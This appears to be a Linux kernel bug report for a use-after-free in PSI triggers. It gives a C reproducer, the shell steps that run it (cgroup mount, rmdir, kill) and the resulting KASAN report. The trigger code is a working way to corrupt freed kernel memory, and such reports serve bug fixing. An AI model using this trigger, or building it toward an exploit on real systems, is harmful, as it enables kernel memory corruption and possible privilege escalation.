PSI trigger use-after-free: a psi_trigger freed by psi_trigger_destroy() during cgroup rmdir is still linked into an epoll wait queue, so the process's later exit path (ep_free() → remove_wait_queue()) writes into the freed kmalloc-128 object. Reproducer below, with the KASAN report from 6.2.0-rc3.
[ec2-user@ip-10-0-26-185 ~]$ | |
[ec2-user@ip-10-0-26-185 ~]$ cat psi-uaf.c | |
#include <fcntl.h>
#include <stdio.h>
#include <sys/epoll.h>
#include <unistd.h>
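/*
 * Reproducer for the PSI trigger use-after-free.
 *
 * Arms a PSI trigger on a cgroup's cpu.pressure file, registers that fd with
 * epoll, then blocks.  The remaining steps happen from outside the process:
 * `rmdir` of the cgroup drains the open file and frees the trigger while the
 * epoll instance still holds a wait entry on it, and killing the process then
 * makes ep_free() touch the freed memory (see the KASAN report that follows).
 *
 * argv[1] optionally overrides the pressure-file path; the default is
 * /cgroup2/test/cpu.pressure.  Every setup syscall is checked and reported
 * with perror() so that a run that never armed the trigger (wrong mount path,
 * missing cgroup, no CAP_SYS_ADMIN) is not mistaken for a non-reproducing one.
 */
int main(int argc, char **argv)
{
	/*
	 * Trigger spec: "some" stall, 100ms threshold, 1s window.  Whether the
	 * threshold ever fires is not what the reproducer depends on; the write
	 * only has to be accepted so that psi_trigger_create() allocates the
	 * trigger.
	 */
	static const char trigger_str[] = "some 100000 1000000";
	const char *path = argc > 1 ? argv[1] : "/cgroup2/test/cpu.pressure";
	struct epoll_event event = { .events = EPOLLPRI | EPOLLET };
	struct epoll_event events[1];
	int fd, epfd;

	fd = open(path, O_RDWR);
	if (fd < 0) {
		perror("open");
		return 1;
	}

	/* sizeof() deliberately includes the terminating NUL, as in the original PoC. */
	if (write(fd, trigger_str, sizeof(trigger_str)) != (ssize_t)sizeof(trigger_str)) {
		perror("write");
		return 1;
	}

	epfd = epoll_create(1);
	if (epfd < 0) {
		perror("epoll_create");
		return 1;
	}

	event.data.fd = fd;
	if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event) < 0) {
		perror("epoll_ctl");
		return 1;
	}

	/*
	 * Block indefinitely.  Neither fd is closed on purpose: the epoll
	 * instance must still reference the trigger's wait queue when the
	 * cgroup is removed and the process is killed.
	 */
	epoll_wait(epfd, events, 1, -1);
	pause();
	return 0;
}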
[ec2-user@ip-10-0-26-185 ~]$ gcc psi-uaf.c | |
[ec2-user@ip-10-0-26-185 ~]$ | |
[ec2-user@ip-10-0-26-185 ~]$ sudo mount -t cgroup2 none /cgroup2/ | |
[ec2-user@ip-10-0-26-185 ~]$ sudo mkdir /cgroup2/test | |
[ec2-user@ip-10-0-26-185 ~]$ sudo ./a.out & | |
[1] 2384 | |
[ec2-user@ip-10-0-26-185 ~]$ sudo rmdir /cgroup2/test | |
[ec2-user@ip-10-0-26-185 ~]$ sudo killall a.out | |
[ec2-user@ip-10-0-26-185 ~]$ | |
[1]+ Terminated sudo ./a.out | |
[ec2-user@ip-10-0-26-185 ~]$ dmesg | |
... | |
[ 102.806193] ================================================================== | |
[ 102.813207] BUG: KASAN: use-after-free in _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.816011] Write of size 4 at addr ffff888003324928 by task a.out/2385 | |
[ 102.834487] CPU: 0 PID: 2385 Comm: a.out Not tainted 6.2.0-rc3 #28 | |
[ 102.836744] Hardware name: Amazon EC2 t3.micro/, BIOS 1.0 10/16/2017 | |
[ 102.839159] Call Trace: | |
[ 102.840179] <TASK> | |
[ 102.841141] dump_stack_lvl+0x8f/0xc0 | |
[ 102.842611] print_report+0x16c/0x4e0 | |
[ 102.844140] ? _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.845863] kasan_report+0xc3/0xf0 | |
[ 102.847312] ? mt_destroy_walk+0xa0a/0xa90 | |
[ 102.848856] ? _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.850560] kasan_check_range+0x2d2/0x310 | |
[ 102.852214] _raw_spin_lock_irqsave+0x76/0x130 | |
[ 102.854020] remove_wait_queue+0x25/0x130 | |
[ 102.855540] ep_free+0x12d/0x220 | |
[ 102.856906] ep_eventpoll_release+0x3c/0x40 | |
[ 102.858463] __fput+0x32b/0x700 | |
[ 102.862403] task_work_run+0x1db/0x230 | |
[ 102.865666] do_exit+0x750/0x2090 | |
[ 102.868718] do_group_exit+0x221/0x230 | |
[ 102.871898] get_signal+0x1768/0x1810 | |
[ 102.874963] ? __schedule+0xf60/0x16e0 | |
[ 102.878203] arch_do_signal_or_restart+0x2e/0x4d0 | |
[ 102.881651] exit_to_user_mode_prepare+0x94/0x100 | |
[ 102.885056] syscall_exit_to_user_mode+0x20/0x40 | |
[ 102.888419] do_syscall_64+0x52/0x90 | |
[ 102.891412] entry_SYSCALL_64_after_hwframe+0x63/0xcd | |
[ 102.894952] RIP: 0033:0x7f20be0bfb91 | |
[ 102.898040] Code: Unable to access opcode bytes at 0x7f20be0bfb67. | |
[ 102.903104] RSP: 002b:00007ffe8f20f418 EFLAGS: 00000246 ORIG_RAX: 0000000000000022 | |
[ 102.909299] RAX: fffffffffffffdfe RBX: 0000000000000000 RCX: 00007f20be0bfb91 | |
[ 102.913767] RDX: 0000000000000001 RSI: 00007ffe8f20f428 RDI: 0000000000000004 | |
[ 102.917980] RBP: 00007ffe8f20f460 R08: 0000000000400780 R09: 00007f20be40f240 | |
[ 102.922173] R10: 00000000000003df R11: 0000000000000246 R12: 00000000004005a0 | |
[ 102.927445] R13: 00007ffe8f20f540 R14: 0000000000000000 R15: 0000000000000000 | |
[ 102.931674] </TASK> | |
[ 102.936679] Allocated by task 2385: | |
[ 102.939681] kasan_set_track+0x3d/0x60 | |
[ 102.942802] __kasan_kmalloc+0x85/0x90 | |
[ 102.945878] psi_trigger_create+0x155/0x850 | |
[ 102.949189] pressure_write+0x200/0x510 | |
[ 102.954214] cgroup_file_write+0x1de/0x3e0 | |
[ 102.957528] kernfs_fop_write_iter+0x27d/0x380 | |
[ 102.960842] vfs_write+0x7d7/0xaa0 | |
[ 102.963878] ksys_write+0xd7/0x1a0 | |
[ 102.967736] do_syscall_64+0x43/0x90 | |
[ 102.970956] entry_SYSCALL_64_after_hwframe+0x63/0xcd | |
[ 102.976903] Freed by task 2391: | |
[ 102.979839] kasan_set_track+0x3d/0x60 | |
[ 102.982905] kasan_save_free_info+0x27/0x40 | |
[ 102.986143] ____kasan_slab_free+0x11d/0x170 | |
[ 102.989412] slab_free_freelist_hook+0x87/0x150 | |
[ 102.992823] __kmem_cache_free+0xcb/0x180 | |
[ 102.996070] psi_trigger_destroy+0x458/0x550 | |
[ 102.999359] cgroup_file_release+0x96/0x110 | |
[ 103.002633] kernfs_drain_open_files+0x238/0x420 | |
[ 103.005985] kernfs_drain+0x191/0x2a0 | |
[ 103.009015] __kernfs_remove+0x3a6/0x600 | |
[ 103.012157] kernfs_remove_by_name_ns+0xc2/0x120 | |
[ 103.017230] cgroup_addrm_files+0x90f/0xcf0 | |
[ 103.020743] cgroup_destroy_locked+0x48a/0x730 | |
[ 103.024209] cgroup_rmdir+0x2b/0x130 | |
[ 103.028249] kernfs_iop_rmdir+0x17a/0x230 | |
[ 103.032415] vfs_rmdir+0x196/0x410 | |
[ 103.035508] do_rmdir+0x1c7/0x3f0 | |
[ 103.038586] __x64_sys_rmdir+0x45/0x50 | |
[ 103.041748] do_syscall_64+0x43/0x90 | |
[ 103.044859] entry_SYSCALL_64_after_hwframe+0x63/0xcd | |
[ 103.050836] The buggy address belongs to the object at ffff888003324900 | |
which belongs to the cache kmalloc-128 of size 128 | |
[ 103.058548] The buggy address is located 40 bytes inside of | |
128-byte region [ffff888003324900, ffff888003324980) | |
[ 103.068277] The buggy address belongs to the physical page: | |
[ 103.071930] page:00000000b4928b2a refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x3324 | |
[ 103.078482] flags: 0x1fffff80000200(slab|node=0|zone=1|lastcpupid=0x1fffff) | |
[ 103.082682] raw: 001fffff80000200 ffff8880010418c0 ffffea0000063f00 dead000000000004 | |
[ 103.088748] raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000 | |
[ 103.094786] page dumped because: kasan: bad access detected | |
[ 103.100769] Memory state around the buggy address: | |
[ 103.104191] ffff888003324800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb | |
[ 103.110891] ffff888003324880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | |
[ 103.116871] >ffff888003324900: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb | |
[ 103.122768] ^ | |
[ 103.126145] ffff888003324980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | |
[ 103.132261] ffff888003324a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb | |
[ 103.138220] ================================================================== | |
[ 103.144469] Disabling lock debugging due to kernel taint |